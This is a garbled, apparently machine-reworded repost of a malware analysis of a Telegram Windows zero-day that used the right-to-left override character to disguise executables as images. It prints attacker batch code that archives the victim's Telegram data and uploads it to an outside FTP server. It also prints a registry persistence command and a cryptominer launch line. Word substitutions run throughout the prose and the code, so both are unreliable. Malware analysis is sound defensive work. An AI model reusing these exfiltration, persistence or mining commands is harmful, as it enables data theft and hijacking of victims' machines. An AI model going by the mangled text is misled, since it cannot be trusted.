Home » HACKER-TECH » Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

zeroday-vulnerability-in-telegram-hacker-tech-news-portray-show-news-business-blog--many-good-internet-things

In October 2017, we realized of a vulnerability in Telegram Messenger’s Home windows client that changed into once being exploited within the wild. It entails utilizing a traditional superior-to-left override attack when a person sends data over the messenger carrier.

True-to-left override in a nutshell

The particular nonprinting superior-to-left override (RLO) personality is primitive to reverse the give an explanation for of the characters that near after that personality within the string. In the Unicode personality desk, it is represented as ‘U+202E’; one keep of agreeable use is when typing Arabic text. In an attack, this personality might most certainly well even be primitive to mislead the sufferer. It’s on the full primitive when displaying the title and extension of an executable file: a little bit of instrument inclined to this kind of attack will repeat the filename incompletely or in reverse.

Launching an attack on Telegram

Below is an legend of how this vulnerability changed into once exploited in Telegram:

    • The cybercriminal prepares the malware to be sent in a message. As an instance, a JS file is renamed as follows:

defective.js -> photo_high_re*U+202E*gnp.js
The keep *U+202E* is the RLO personality to develop Telegram repeat the final string gnp.js in reverse. Prove that this operation would now not alternate the correct file – it peaceful has the extension *.js.

  • The attacker sends the message, and – shock! – the recipient sees an incoming PNG portray file as a alternative of a JS file:

 

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

 

  • When the person clicks on this file, the fashioned Home windows security notification is displayed:

 

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Importantly, this notification is handiest displayed if it hasn’t been disabled within the system’s settings. If the person clicks on ‘Dawdle’, the malicious file is launched.

Exploitation within the wild

After finding out the vulnerability, we started to learn cases where it changed into once in point of reality exploited. These cases drop into a number of fashioned scenarios.

Far off regulate

The blueprint of this kind of attack is to want regulate of the sufferer’s system, and entails the attacker finding out the aim system’s ambiance and the set up of additional modules.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the major stage, a downloader is disbursed to the aim, which is written in .Rep, and uses Telegram API as the give an explanation for protocol:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

With this token and API, it is easy to search out the Telegram bot by capability of which the contaminated programs are managed:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

When launched, it modifies startup registry key to manufacture persistence on a system and copies its executable file into one in all the directories, relying on the ambiance:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Then it begins to test every two seconds for instructions getting again from the regulate bot. Prove that the instructions are implemented in Russian:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The list of supported instructions reveals that the bot can silently deploy arbitrary malicious tools take care of backdoors, loggers and other malware on the aim system. A complete list of supported instructions is given under:

Explain
(English translation)
Characteristic
“Онлайн
(On-line)
Ship list of data in directory to manipulate bot.
“Запус
(Launch)
Launch executable file utilizing Route of.Open().
“Логгер
(Logger)
Take a look at if tor job is running, receive logg.zip, unpack it, delete the archive and starting up its content.
“Скачать
(Net)
Net file into its comprise directory.
“Удалить
(Delete)
Delete file from its comprise directory.
“Распаковать
(Unpack)
Unpack archive in its comprise directory utilizing specified password.
Убить
(Cancel)
Terminate specified job utilizing job.Cancel()
Скачат
(Net)
Connected as ‘Net’ (peep above), with assorted give an explanation for parsing.
Запуск
(Launch)
Connected as ‘Launch’ (peep above), with assorted give an explanation for parsing.
Удалить
(Delete)
Connected as ‘Delete’ (peep above), with assorted give an explanation for parsing.
Распаковать
(Unpack)
Connected as ‘Unpack’ (peep above), with assorted give an explanation for parsing.
Процессы
(Processes)
Ship a checklist of instructions running on course PC to manipulate bot.

An analysis of these instructions reveals that this loader will most likely be designed to receive but any other piece of malware, most certainly a logger that will most certainly well stare on the sufferer person.

Miners and extra

Amid the cryptocurrency allege, cybercriminals are increasingly moving away from ‘traditional robbery’ to a brand unusual procedure of making cash from their victims – particularly mining cryptocurrency utilizing the sources of an contaminated computer. All they must fabricate is mosey a mining client on the sufferer computer and specify the information of their cryptocurrency pockets.

Space #1

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the major stage of the attack, an SFX archive with a script is primitive that launches an executable file:

Route=%temp%adr
Setup=%temp%adrmosey.exe
Silent=1
Overwrite=2

This mosey.exe file is genuinely a BAT file. The batch script, after extraction, looks take care of this:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

As we are in a position to peep, the malicious program first opens a decoy file – on this case it is an portray to lull the sufferer accurate into a false sense of security.

Then, two miners starting up one after the opposite. They’re launched as providers with the abet of the nssm.exe utility, which will most likely be contained within the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (on this notify case, it mined Zcash). Can use the sources of both the CPU and graphics accelerator:
    zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things
  • taskmgn.exe – but any other smartly-liked miner enforcing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a identified notify string with pdb path:
    zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

We comprise seen a number of variations of this batch script, a pair of of which comprise additional components:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

This notify version disables Home windows security components, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload changed into once an SFX archive that incorporates but any other miners and a Far off Manipulator Procedure (RMS) client, an analog of TeamViewer. The usage of AutoIt scripts, the malware deploys RMS on the focused computer for subsequent distant access:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The attack flowchart is approximately as follows:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

We comprise examined this FTP server and found a number of extra similar payloads, which are most certainly loaded by other variations of this malware.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The file address4.exe is enough of a assorted mention. Love the opposite data, it is an SFX archive with the next contents:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

All components named st*.exe are executable PE data transformed in a similar intention from batch scripts.

The SFX script launches the element st1.exe:

Route=%temp%/adress
Setup=%temp%/adress/st1.exe
Silent=1
Overwrite=2

st1.exe provides st2.exe to the system startup by writing the correct file to the system registry:

reg add HKEY_CURRENT_USERSOFTWAREMicrosoftHome windowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f

So the st2.exe file launches when system is booted subsequent time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to starting up
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%sss
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory accurate into a RAR archive
TIMEOUT /T 60 /NOBREAK
:originate
ping -n 1 ya.ru |>nul secure /i “TTL=” && (originate “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :originate) #Checks Net connection and launches st3.exe

As anticipated, st3.exe logs on to the malicious FTP server and uploads the RAR archive that changed into once created earlier:

@echo XXXXXXXX>give an explanation for.txt
@echo XXXXXXXX>>give an explanation for.txt
@echo binary>>give an explanation for.txt
@echo mput %temp%sss*.rar>>give an explanation for.txt
@echo stop>>give an explanation for.txt
ftp -s:give an explanation for.txt -i free11.receive.com
del give an explanation for.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H

On that FTP server, we found a number of archives of this kind containing Telegram directories stolen from the victims:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Every dump incorporates, as well to the Telegram client’s executables and utility data, an encrypted local cache containing assorted data primitive in interior most communications: documents, movies and audio data and photos.

Space #2

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Appropriate take care of within the previous scenario, an attack begins with an SFX archive opening and launching a VBScript that it incorporates. Its indispensable job is to starting up a decoy portray to distract the person, after which receive and starting up the payload:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The payload is an SFX archive with the next script:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

svchost.vbs is a script controlling the starting up of the miner CryptoNight (csrs.exe). It shows the duty list; if it detects a assignment supervisor (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s job and re-launches it when the duty supervisor is closed.

The script incorporates the correct comments:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

The miner itself is launched as follows:

WshShell.Dawdle “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, zero

The pool address is associated with the cryptocurrency Monero.

On the server itself, as well to to the specified payload data, we found similar SFX archives with miners:

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-things

Conclusion

It looks that handiest Russian cybercriminals comprise been conscious about this vulnerability, with all of the exploitation cases that we detected taking place in Russia. Also, whereas conducting a detailed learn of these assaults we found a bunch of artifacts that pointed to involvement by Russian cybercriminals.

We don’t comprise proper information about how prolonged and which variations of the Telegram products comprise been littered with the vulnerability. What we fabricate know is that its exploitation in Home windows customers started in March 2017. We told the Telegram builders of the world, and the vulnerability no longer occurs in Telegram’s products.

This paper items handiest those cases that comprise been reported by Kaspersky Lab’s telemetry programs. The fleshy scope and other techniques of exploitation live unknown.

IoC

MD5

First stage

650DDDE919F9E5B854F8C375D3251C21
C384E62E483896799B38437E53CD9749
FA391BEAAF8B087A332833E618ABC358
52F7B21CCD7B1159908BCAA143E27945
B1760E8581F6745CBFCBE76FBD0ACBFA
A662D942F0E43474984766197288845B

Payloads

B9EEC74CA8B14F899837A6BEB7094F65
46B36F8FF2369E883300F472694BBD4D
10B1301EAB4B4A00E7654ECFA6454B20
CD5C5423EC3D19E864B2AE1C1A9DDBBC
7A3D9C0E2EA27F1B96AEFED2BF8971A4
E89FDDB32D7EC98B3B68AB7681FACCFC
27DDD96A87FBA2C15B5C971BA6EB80C6
844825B1336405DDE728B993C6B52A83
C6A795C27DEC3F5559FD65884457F6F3
89E42CB485D65F71F62BC1B64C6BEC95
0492C336E869A14071B1B0EF613D9899
2CC9ECD5566C921D3876330DFC66FC02
1CE28167436919BD0A8C1F47AB1182C4

C2 servers

http://nord.adr[.]com[.]ua/

Filenames

title?gpj.exe
title?gpj.rar
address?gpj.scr
address_?gpj.scr
photoadr?gepj.scr

Learn More

Leave a Reply

Your email address will not be published. Required fields are marked *

*